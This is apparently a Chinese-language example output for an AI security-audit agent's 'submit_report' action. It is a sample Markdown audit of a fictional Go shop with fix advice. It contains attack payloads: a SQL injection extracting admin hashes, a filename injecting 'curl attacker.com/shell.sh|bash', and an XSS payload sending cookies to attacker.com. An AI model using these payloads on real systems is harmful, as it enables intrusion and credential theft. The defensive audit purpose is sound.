## submit_report 输出示例

报告内容是完整的 Markdown 字符串，通过 `report_content` 字段提交。

```json
{
  "@action": "submit_report",
  "human_readable_thought": "已整理所有验证结果：confirmed 2 个（HIGH），uncertain 1 个（MEDIUM）。现在生成完整 Markdown 报告。",
  "report_content": "# MyShop 安全审计报告\n\n> 审计时间：2024-03-15 10:30:00 | 项目路径：/opt/myshop | 技术栈：Go 1.21, Gin v1.9, GORM v2, MySQL 8.0\n\n---\n\n## 执行摘要\n\n项目共发现 2 个高危漏洞（SQL 注入、命令注入），1 个待人工确认的中危漏洞（XSS），整体安全状况较差。主要风险集中在用户输入未经充分验证直接传入危险函数，建议优先修复高危漏洞并全面引入参数化查询。\n\n| 指标 | 数量 |\n|------|------|\n| 扫描 Finding 数 | 4 |\n| 高危 (HIGH) | 2 |\n| 中危 (MEDIUM) | 0 |\n| 低危 (LOW) | 0 |\n| 需人工确认 | 1 |\n| 已排除（安全）| 1 |\n\n---\n\n## 漏洞详情\n\n### [HIGH-01] 用户搜索接口 SQL 注入 (`handler/user.go:88`)\n\n**漏洞类型：** sql_injection  \n**置信度：** 9/10  \n\n**描述：**  \n`UserHandler.Search()` 中，HTTP GET 参数 `name` 通过 `c.Query(\"name\")` 获取后，未经任何过滤直接拼接进 `db.Raw()` 的 SQL 字符串，攻击者可注入任意 SQL 语句。\n\n**数据流：**  \n`GET /api/users?name=` → `UserHandler.Search()[handler/user.go:42]` → `c.Query(\"name\")[handler/user.go:55]` → `db.Raw(\"SELECT * FROM users WHERE name='\" + name + \"'\")[handler/user.go:88]`\n\n**攻击场景：**  \n```\nGET /api/users?name=' UNION SELECT id,password,salt FROM admin_users--\n```\n可提取所有管理员账号密码哈希值。\n\n**修复建议：**  \n```go\n// 修复前（危险）\ndb.Raw(\"SELECT * FROM users WHERE name='\" + name + \"'\")\n\n// 修复后（安全）\ndb.Where(\"name = ?\", name).Find(&users)\n```\n\n---\n\n### [HIGH-02] 文件转换接口命令注入 (`service/convert.go:67`)\n\n**漏洞类型：** cmd_injection  \n**置信度：** 8/10  \n\n**描述：**  \n`ConvertService.Process()` 中，用户上传的文件名 `filename` 参数未经过滤直接拼接进 shell 命令字符串，通过 `exec.Command(\"bash\",\"-c\",cmd)` 执行，攻击者可通过文件名注入任意系统命令。\n\n**数据流：**  \n`POST /api/file/convert multipart.filename` → `FileHandler.Convert()[handler/file.go:31]` → `c.PostForm(\"filename\")[handler/file.go:38]` → `exec.Command(\"bash\",\"-c\",\"convert \"+filename)[service/convert.go:67]`\n\n**攻击场景：**  \n```\n设置 filename = \"a.jpg;curl http://attacker.com/shell.sh|bash\"\n```\n上传后服务器将执行攻击者控制的脚本，可获取服务器 Shell。\n\n**修复建议：**  \n```go\n// 修复前（危险）\ncmd := exec.Command(\"bash\", \"-c\", \"convert \"+filename)\n\n// 修复后（安全）\n// 1. 白名单验证文件名\nmatched, _ := regexp.MatchString(`^[a-zA-Z0-9._-]+$`, filename)\nif !matched { return errors.New(\"invalid filename\") }\n// 2. 参数数组形式，无 shell 解析\ncmd := exec.Command(\"convert\", inputPath, outputPath)\n```\n\n---\n\n### [UNCERTAIN-01] 评论接口疑似存储型 XSS（[需人工确认]）(`handler/comment.go:88`)\n\n**漏洞类型：** xss_injection  \n**置信度：** 5/10  \n\n> [需人工确认]：存在自定义 `sanitize()` 函数，静态分析无法完全确认过滤有效性。\n\n**描述：**  \n`CommentHandler.Create()` 中，用户提交的 `content` 字段经过自定义 `util.Sanitize()` 函数处理后，直接写入数据库并输出到 HTML 模板，若 `sanitize()` 存在绕过则可导致存储型 XSS。\n\n**数据流：**  \n`POST /api/comment body.content` → `util.Sanitize(content)[handler/comment.go:52]` → `db.Create(&comment)[handler/comment.go:60]` → `template.HTML(comment.Content)[views/comment.html:88]`\n\n**攻击场景：**  \n若 `sanitize()` 可被绕过，提交 `<img src=x onerror=fetch('https://attacker.com/?c='+document.cookie)>` 可窃取用户 Cookie，导致账号劫持。\n\n**修复建议：**  \n使用 Go 标准库 `html.EscapeString()` 转义，或依赖 Go template 自动转义机制（避免使用 `template.HTML()` 类型转换跳过转义）。\n\n---\n\n## 整体安全加固建议\n\n1. **全面采用参数化查询**：禁止在 ORM/原生 SQL 中使用字符串拼接，统一使用 `?` 占位符或 GORM 的参数化 API。\n2. **命令执行参数化**：所有 `exec.Command` 调用必须使用参数数组形式，禁止 `bash -c \"...\"` + 字符串拼接模式。\n3. **输入白名单验证**：文件名、用户标识等关键字段使用正则白名单（`^[a-zA-Z0-9._-]+$`），拒绝所有不符合规则的输入。\n4. **HTML 模板安全**：禁止使用 `template.HTML()`、`template.JS()` 等类型转换，依赖 Go template 的自动 HTML 转义。\n5. **引入 SAST 工具**：集成 gosec 等静态分析工具到 CI/CD 流程，在代码合并前自动检测高风险模式。\n"
}
```
